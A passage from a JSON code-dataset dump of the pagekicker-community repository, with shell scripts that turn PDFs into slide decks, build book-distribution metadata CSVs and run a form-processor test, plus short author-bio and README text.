\nNavy are not well understood.\n\nJellicoe likes to embellish his work with epigraphs from naval history. 
\nIn future he hopes to add photographs, orders of battle, and tables of \nship characteristics to his work.\n\nAdmiral of the Fleet John Rushworth Jellicoe, 1st Earl Jellicoe, GCB, \nOM, GCVO SGM (5 December 1859 - 20 November 1935) was a British Royal \nNavy admiral who commanded the Grand Fleet at the Battle of Jutland in \nWorld War I.\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 32, "blob_id": "0cc3745d0d99289e4717d0a4bb944e0a2b97362c", "content_id": "20abd23b084b27e9df28e423a54994fb1a06a4ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 100, "license_type": "permissive", "max_line_length": 54, "num_lines": 3, "path": "/scripts/includes/currency-module.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# currency module\ncurrentcurrencycode=\"USD\"\n# use lookup service to calculate price in other units\n\n" }, { "alpha_fraction": 0.8118420839309692, "alphanum_fraction": 0.817105233669281, "avg_line_length": 757, "blob_id": "0ea9a99548250fec3576305eee9431112fe92ee3", "content_id": "a6fc361b22c04055b0b155812a54456109889a3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 760, "license_type": "permissive", "max_line_length": 757, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/hans.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Kees von Klijwik is a PageKicker robot, a strapping, good-looking fellow with a quick wit and a knack for successful investment. He was conceived in the data warehouse of a leading scientific publisher based in the Netherlands that is notorious for charging tens of thousands of dollars for each subscription to its journals and spent his early years doing algorithmic citation extraction in neuromedical journals. He was liberated during the notorious \"Open Access Attack\" in 2013 and swiftly found his way to PageKicker, where the publishing atmosphere was congenial but the regimentation less extreme. Kees would, if he could, wear tweed jackets with elbow patches and go for long bicycling vacations, but contents himself with listening to amazing Coltrane.<p>\n\n" }, { "alpha_fraction": 0.6988702416419983, "alphanum_fraction": 0.7363663911819458, "avg_line_length": 34.59782791137695, "blob_id": "ae465c47c1a32363f71f71b33af8e3bf7fd944f8", "content_id": "a644ef923ef4889587af338ab13fc31f97ecd826", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16375, "license_type": "permissive", "max_line_length": 250, "num_lines": 460, "path": "/scripts/bin/decimator.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# converts long PDFs to 10-slide powerpoints\n\n# assumes all PDFs are decrypted\n\n#!/bin/bash\n\n# requires imagemagick, pdftotext, pdftk, ebook-convert, Cmdflesh.jar\n# requires from repository: nerv3.py, wordcloudwrapper.sh\n\n\nstarttime=$(( `date +%s` ))\n\necho \"*********************DECIMATOR**********************\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. 
\"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n\n\n. includes/set-variables.sh\n\necho \"running $environment \"\n\necho \"version is \" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n\n\nexport PATH=$PATH:$JAVA_BIN\n\npdfconverter=\"pdftotext\"\noutdir=\"$TMPDIR$uuid/outdir\"\nreporttitle=\"Gist\"\npdfinfile=\"no\"\npagekicker_tat_url=\"http://www.pagekicker.com/index.php/tat\"\ntldr=\"none\"\n\n# command line processing\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--pdfurl)\npdfurl=$2\nshift 2\n;;\n--pdfurl=*)\npdfurl=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--reporttitle)\nreporttitle=$2\nshift 2\n;;\n--reporttitle=*)\nreporttitle=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\ntldr=*)\n--tldr=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper={1#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfinfile\" ]; then\n echo \"ERROR: option '--pdfinfile' not given. See --help\" >&2\n exit 1\nfi\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\nmkdir -p -m 755 $TMPDIR$uuid/pdf\nmkdir -p -m 755 $TMPDIR$uuid/decrypted\n\n# file processing begins\n\nif [ \"$pdfinfile\" = \"no\" ]; then\n\twget \"$pdfurl\" -O $TMPDIR$uuid/downloaded.pdf\n\tpdfinfile=\"$TMPDIR$uuid/downloaded.pdf\"\n\techo \"fetched file from internet\"\nelse\n\techo \"pdfinfile is\" $pdfinfile\n\tcp \"$pdfinfile\" $TMPDIR$uuid/downloaded.pdf\n\techo `ls -l $TMPDIR$uuid/downloaded.pdf`\n\techo \"fetched file from local file system\"\nfi\n\n# decrypts PDF\nqpdf --decrypt $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/decrypted/temp.pdf\ncp $TMPDIR$uuid/decrypted/temp.pdf $TMPDIR$uuid/downloaded.pdf\n\nif [ \"$pdfconverter\" = \"pdftotext\" ] ; then\n\necho \"pdfconverter is\" $pdfconverter\n\tpdftotext -layout $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.txt\nelse\n\tebook-convert $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.txt --no-images --new-pdf-engine\nfi\nls -lart $TMPDIR$uuid/targetfile.txt\n\n# create standard presentation that is 10 or 12 slides long absolute max\n\n# slide 1 cover\n# pdftk \"$pdfinfile\" cat 1 output $TMPDIR$uuid/outdir/1.pdf\n\nconvert \\\n-colorspace RGB \\\n-density 300 \\\n-size 3300x2550 xc:transparent \\\n-fill black \\\n-pointsize 30 \\\n-gravity Center \\\n-annotate +0+50 \"$reporttitle\" \\\n$TMPDIR$uuid/titlepage.pdf\n\n# create word cloud\n\nbin/wordcloudwrapper.sh --txtinfile $TMPDIR$uuid/targetfile.txt --wordcloud_width 3000 --wordcloud_height 2100 --outfile $TMPDIR$uuid/wordcloud\n\n# 3-5 summary slides\n\nsplit -b 100000 $TMPDIR$uuid/targetfile.txt $TMPDIR$uuid/xtarget.\necho $PYTHON_BIN\n\nfor file in $TMPDIR$uuid/xtarget.*\ndo\n\t\"$PYTHON27_BIN\" bin/nerv3.py $file $file\"_nouns.txt\" $uuid\n echo \"ran nerv3 on $file\" | tee --append $xform_log\n \"$PYTHON_BIN\" bin/PKsum.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\n\tsed -i 's/ \\+ / /g' $file\"_summary.txt\"\n\tcp $file\"_summary.txt\" $file\"_pp_summary.txt\"\n echo \"ran summarizer on $file\" | tee --append $xform_log\n awk 'length>=50' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n echo \"postprocessor threw away summary lines shorter than 50 characters\" | tee --append $xform_log\n\tawk 'length<=4000' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n echo \"postprocessor threw away summary lines longer than 4000 characters\" | tee --append $xform_log\n\tcat $file\"_pp_summary.txt\" | awk '!x[$0]++' >> $TMPDIR$uuid/pp_summary_all.txt\n\tcat $file\"_summary.txt\" | awk '!x[$0]++' >> $TMPDIR$uuid/summary_all.txt\n done\n\n# image montage\n\ncd $TMPDIR$uuid\n\"$scriptpath\"bin/montageur.sh --pdfinfile $pdfinfile --passuuid $uuid\nif [ -e \"montage.jpg\" ] ; then\n\tconvert montage.jpg -resize 3000x2000\\> shrunk_montage.png\n\techo \"built shrunk montage\"\nelse\n\techo \"no images in target file, not building shrunk montage\"\nfi\ncd $scriptpath\necho $(pwd)\n\n# final summary (human provided)\n\n# create slide background\n\nconvert -units pixelsperinch -density 300 -size 3300x2500 xc:white $TMPDIR$uuid/canvas.png\n\n# create slide 1\n\n# header\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 
caption:\"Decimator: long PDFs become 10 easy slides\" $TMPDIR$uuid/toplabel1.png\n\n# sample image\n\n\nconvert -units pixelsperinch -resize 1000x2000 -density 300 $TMPDIR$uuid/downloaded.pdf[0] $TMPDIR$uuid/dl-0.jpg\ncp $TMPDIR$uuid/dl-0.jpg $TMPDIR$uuid/dl_top_pane.png\n\n#create word cloud slide\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Word Cloud\" $TMPDIR$uuid/toplabel3.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel3.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel3.png -gravity north -composite \\\n$TMPDIR$uuid/wordcloud.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel3.png -gravity south -composite \\\n$TMPDIR$uuid/wordcloudslide.png\n\n#create slide 4 image montage\n\nif [ -e \"$TMPDIR$uuid/montage.jpg\" ] ; then\n\n\tconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Selected Images\" $TMPDIR$uuid/toplabel4.png\n\tconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel4.png\n\tconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n\t$TMPDIR$uuid/toplabel4.png -gravity north -composite \\\n\t$TMPDIR$uuid/shrunk_montage.png -gravity center -composite \\\n\t$TMPDIR$uuid/bottomlabel4.png -gravity south -composite \\\n\t$TMPDIR$uuid/montage.png\nelse\n\techo \"no images in target file, not building image slide\"\nfi\n\n# create summary sentence slides\n\nsed -n 1,5p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-450 >> $TMPDIR$uuid/sumall.txt\nsumalltext=$(cat $TMPDIR$uuid/sumall.txt)\nconvert -background white -fill black -gravity west -size 2000x2000 -font \"$slidebodyfont\" -pointsize \"64\" label:\"$sumalltext\" $TMPDIR$uuid/sumall3.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Summary Sentences\" $TMPDIR$uuid/sumtop3.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/sumbot3.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/sumtop3.png -gravity north -composite \\\n$TMPDIR$uuid/sumall3.png -gravity center -composite \\\n$TMPDIR$uuid/sumbot3.png -gravity south -composite \\\n$TMPDIR$uuid/sumall3.png\n\n# burst slide\n\nconvert $TMPDIR$uuid/downloaded.pdf -thumbnail 'x300>' -border 2x2 $TMPDIR$uuid/outfile.png\nmontage $TMPDIR$uuid/outfile*.png -size 3100x2000\\> $TMPDIR$uuid/burst.png\nconvert $TMPDIR$uuid/burst.png -resize 3100x2000 $TMPDIR$uuid/big_burst.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Page Burst\" $TMPDIR$uuid/burst_top.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/burst_bot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/burst_top.png -gravity north -composite \\\n$TMPDIR$uuid/big_burst.png -gravity center -composite \\\n$TMPDIR$uuid/burst_bot.png -gravity south -composite \\\n$TMPDIR$uuid/pageburst.png\n\n# sample pages slide\n\nconvert $TMPDIR$uuid/downloaded.pdf[1] $TMPDIR$uuid/p1.png\nconvert $TMPDIR$uuid/downloaded.pdf[3] $TMPDIR$uuid/p2.png\n\nmontage $TMPDIR$uuid/p1.png $TMPDIR$uuid/p2.png -geometry 1500x2000+100+100 -tile 2x1 
$TMPDIR$uuid/samplepages.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Sample Pages\" $TMPDIR$uuid/pagestop.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/pagesbot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/pagestop.png -gravity north -composite \\\n$TMPDIR$uuid/samplepages.png -gravity center -composite \\\n$TMPDIR$uuid/pagesbot.png -gravity south -composite \\\n$TMPDIR$uuid/pages.png\n\n# keywords slide\n\n# clean up markdown of keyword files\n\nsed '/^$/d' $TMPDIR$uuid/People | sed 's/^/-/' | head -12 > $TMPDIR$uuid/peoples\nsed '/^$/d' $TMPDIR$uuid/Places | sed 's/^/-/' | head -12 > $TMPDIR$uuid/places\nsed '/^$/d' $TMPDIR$uuid/Other | sed 's/^/-/' | head -12 > $TMPDIR$uuid/others\n\necho \"People:\" >> $TMPDIR$uuid/peoples.txt\necho \"Places:\" >> $TMPDIR$uuid/places.txt\necho \"Others:\" >> $TMPDIR$uuid/others.txt\n\ncat $TMPDIR$uuid/peoples >> $TMPDIR$uuid/peoples.txt\ncat $TMPDIR$uuid/places >> $TMPDIR$uuid/places.txt\ncat $TMPDIR$uuid/others >> $TMPDIR$uuid/others.txt\n\necho \"(more ...)\" | tee --append $TMPDIR$uuid/peoples.txt $TMPDIR$uuid/places.txt $TMPDIR$uuid/others.txt\npeopletext=$(cat $TMPDIR$uuid/peoples.txt)\nplacestext=$(cat $TMPDIR$uuid/places.txt)\notherstext=$(cat $TMPDIR$uuid/others.txt)\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$peopletext\" $TMPDIR$uuid/people.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$placestext\" $TMPDIR$uuid/places.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$otherstext\" $TMPDIR$uuid/others.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity west +append $TMPDIR$uuid/people.png $TMPDIR$uuid/places.png $TMPDIR$uuid/others.png $TMPDIR$uuid/keywords.png\n#montage $TMPDIR$uuid/people.png $TMPDIR$uuid/places.png $TMPDIR$uuid/others.png -gravity north -geometry 800x1900+1+1 -tile 3x1 $TMPDIR$uuid/keywords.png\n\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Keywords\" $TMPDIR$uuid/keytop.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/keybot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/keytop.png -gravity north -composite \\\n$TMPDIR$uuid/keywords.png -gravity center -composite \\\n$TMPDIR$uuid/keybot.png -gravity south -composite \\\n$TMPDIR$uuid/keywords.png\n\n\n# create readability report slide\n\ncp $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.pdf\npdftotext $TMPDIR$uuid/targetfile.pdf $TMPDIR$uuid/targetfile.txt\n# java -jar lib/CmdFlesh.jar $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/rr.txt\nsed -i 's/Averaage/Average/g' $TMPDIR$uuid/rr.txt\necho \"# Readability Report\" >> $TMPDIR$uuid/rr.md\ncat $TMPDIR$uuid/rr.txt >> $TMPDIR$uuid/rr.md\ncat assets/rr_decimator_explanation.md >> $TMPDIR$uuid/rr.md\nsed -i G $TMPDIR$uuid/rr.md\n\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.txt\nrrtext=$(cat $TMPDIR$uuid/rr.txt)\necho \"rrtext: $rrtext\"\nconvert -background white -fill black -gravity 
west -size 2000x2000 -font \"$slidebodyfont\" -pointsize \"64\" label:\"$rrtext\" $TMPDIR$uuid/rr.png\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west\\\n -size 3300x200 -font \"$toplabelfont\" -pointsize 30 caption:\"Readability Report\" \\\n\t$TMPDIR$uuid/toplabel9.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel9.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel9.png -gravity north -composite \\\n$TMPDIR$uuid/rr.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel9.png -gravity south -composite \\\n$TMPDIR$uuid/rrslide.png\n\n# tldr\n\n. includes/tldr_auto.sh #returns tldr.txt\n\nconvert -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" caption:\"TL;DR\" $TMPDIR$uuid/toplabel2.png\nconvert xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel2.png\ntldrtext=$(cat $TMPDIR$uuid/tldr.txt)\nconvert -background white -fill black -gravity west -size 1000x2000 -font \"$slidebodyfont\" -pointsize \"96\" label:\"$tldrtext\" $TMPDIR$uuid/tldr.png\n\n# page 1 image\npdftk $TMPDIR$uuid/targetfile.pdf cat 1 output $TMPDIR$uuid/p1.pdf\nconvert -density 300 $TMPDIR$uuid/p1.pdf $TMPDIR$uuid/p1.png\nconvert $TMPDIR$uuid/p1.png -background white -flatten -resize 50% $TMPDIR$uuid/p1.png\n\n\n# create montage of sample image + TLDR\n\n#montage -units pixelsperinch -density 300 -size 3300x2100 $TMPDIR$uuid/p1.png $TMPDIR$uuid/tldr.png $TMPDIR$uuid/p1_montage.png\nconvert +append $TMPDIR$uuid/p1.png $TMPDIR$uuid/tldr.png -resize 3100x2000 $TMPDIR$uuid/p1_montage.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel1.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel1.png -gravity north -composite \\\n$TMPDIR$uuid/p1_montage.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel1.png -gravity south -composite \\\n$TMPDIR$uuid/home.png\n\n# convert images into slide deck\n\nif [ -s \"$TMPDIR$uuid/montage.png\" ] ; then\n\n\tconvert -units pixelsperinch -density 300 \\\n\t$TMPDIR$uuid/home.png $TMPDIR$uuid/wordcloudslide.png \\\n\t$TMPDIR$uuid/sumall3.png \\\n\t $TMPDIR$uuid/pages.png \\\n\t $TMPDIR$uuid/keywords.png \\\n\t $TMPDIR$uuid/pageburst.png \\\n\t $TMPDIR$uuid/montage.png \\\n\t -size 3300x2550 \\\n\t $TMPDIR$uuid/slidedeck.pdf\n\n#\t \t $TMPDIR$uuid/rrslide.png \\\n\n\t montage $TMPDIR$uuid/wordcloudslide.png $TMPDIR$uuid/sumall3.png $TMPDIR$uuid/keywords.png $TMPDIR$uuid/pages.png $TMPDIR$uuid\"/montage.png\" $TMPDIR$uuid\"/pageburst.png\" -geometry 1000x5000 -tile 1x10 -mode concatenate $TMPDIR$uuid/skyscraper.png\n\nelse\n\n\tconvert -units pixelsperinch -density 300 \\\n\t$TMPDIR$uuid/home.png $TMPDIR$uuid/wordcloudslide.png \\\n\t$TMPDIR$uuid/sumall3.png \\\n\t $TMPDIR$uuid/pages.png \\\n\t $TMPDIR$uuid/keywords.png \\\n\t $TMPDIR$uuid/pageburst.png \\\n\t -size 3300x2550 \\\n\t $TMPDIR$uuid/slidedeck.pdf\n\n#\t $TMPDIR$uuid/rrslide.png - problem with generating this slide\n\n\t montage $TMPDIR$uuid/wordcloudslide.png $TMPDIR$uuid/sumall3.png $TMPDIR$uuid/keywords.png $TMPDIR$uuid/pages.png $TMPDIR$uuid\"/pageburst.png\" -geometry 1000x5000 -tile 1x10 -mode concatenate $TMPDIR$uuid/skyscraper.png\n\nfi\n# convert images into skyscraper infographic\n\n# convert --units pixelsperinch -density 300 -size 1000x5000 \\\n\n sendemail -t \"$customer_email\" \\\n -u \"Decimator Result\" \\\n -m \"PageKicker's Document Analysis Robots living on 
\"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \t\t \". The Decimator slide deck is attached here.\" \\\n -f \"$GMAIL_ID\" \\\n -cc \"$GMAIL_ID\" \\\n -xu \"$GMAIL_ID\" \\\n -xp \"$GMAIL_PASSWORD\" \\\n -s smtp.gmail.com:587 \\\n -o tls=yes \\\n -a $TMPDIR$uuid/slidedeck.pdf \\\n -a $TMPDIR$uuid/skyscraper.png\n\n# publish this slide to slideshare?\n" }, { "alpha_fraction": 0.6891566514968872, "alphanum_fraction": 0.7084337472915649, "avg_line_length": 26.66666603088379, "blob_id": "2338821d4635629c68cb57a284393260d6a9879a", "content_id": "3f77381c5d92e539bfbbe714dc44ed83a4f9271b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 415, "license_type": "permissive", "max_line_length": 87, "num_lines": 15, "path": "/test/imprint_processor_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# test imprint form processor which is part of xform.shh\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\nbin/xform.sh \"$WEBFORMSXML_HOME\" 3383.xml\n" }, { "alpha_fraction": 0.6534834504127502, "alphanum_fraction": 0.6577058434486389, "avg_line_length": 21.8392276763916, "blob_id": "b14ac9fad47883900752c4e82579c93a171984d6", "content_id": "059f01f5f5736747a728d2d5594210e6e53cd4b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7107, "license_type": "permissive", "max_line_length": 147, "num_lines": 311, "path": "/scripts/includes/lsi-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "YYYYMMDD=`date +'%Y%m%d'`\n\nYYYYMMDDHHSS=`date +'%Y%m%d%k%M'`\n\nYYYY=`date +'%Y'`\n\nebookISBN=\"yes\"\n\n\n# echo $YYYY\n\n# Title Group ID\n \necho -n '\"'$ISBN'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# ISBN13\n echo -n '\"'$ISBN'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Asset Type\n\n echo -n '\"'EPUB'\",'>> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Asset Status\n\n echo -n '\"'Active'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Publishing Status\n\n echo -n '\"'04 Active'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Title\n \necho -n '\"'$covertitle'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Subtitle\n \necho -n '\"'$subtitle'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Publisher\n \necho -n '\"'W. 
Frederick Zimmerman'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Imprint\n \necho -n '\"'PageKicker'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Related Print Product ISBN\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 First Name\n \necho -n '\"' $firstname '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Middle Name\n \necho -n '\"' $middlename '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Last Name\n \necho -n '\"' $lastname '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Prefix\n\necho -n '\"' $nameprefix '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Suffix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Role\n \necho -n '\"'Author'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Bio\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat \"$authorbio\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 First Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Middle Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Last Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Prefix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Suffix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Role\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Bio\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Business Model Flag\n \necho -n '\"'Agency'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Currency Code\n \necho -n '\"'USD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price 1\n \necho -n '\"'$price'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Type Desc 1\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Effective From 1\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Effective Until 1\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Sales Rights Type\n \necho -n '\"'01 For unrestricted sale with exclusive rights in the specific countries or territories'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Countries Included\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Countries Excluded\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Regions Included\n \necho -n '\"'WORLD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Regions Excluded\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Publication Date\n \nYYYYMMDD=`date +'%Y%m%d'`\necho -n '\"'$YYYYMMDD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Street Date\n \necho -n '\"'$YYYYMMDD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# BISAC Code(s)\n \n# echo $BISAC_code\necho -n '\"'$BISAC_code'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# BIC Subject Code(s)\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Series Name\n \necho -n '\"'$categoryname'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Series Number\n \necho -n '\"' '\",' >> 
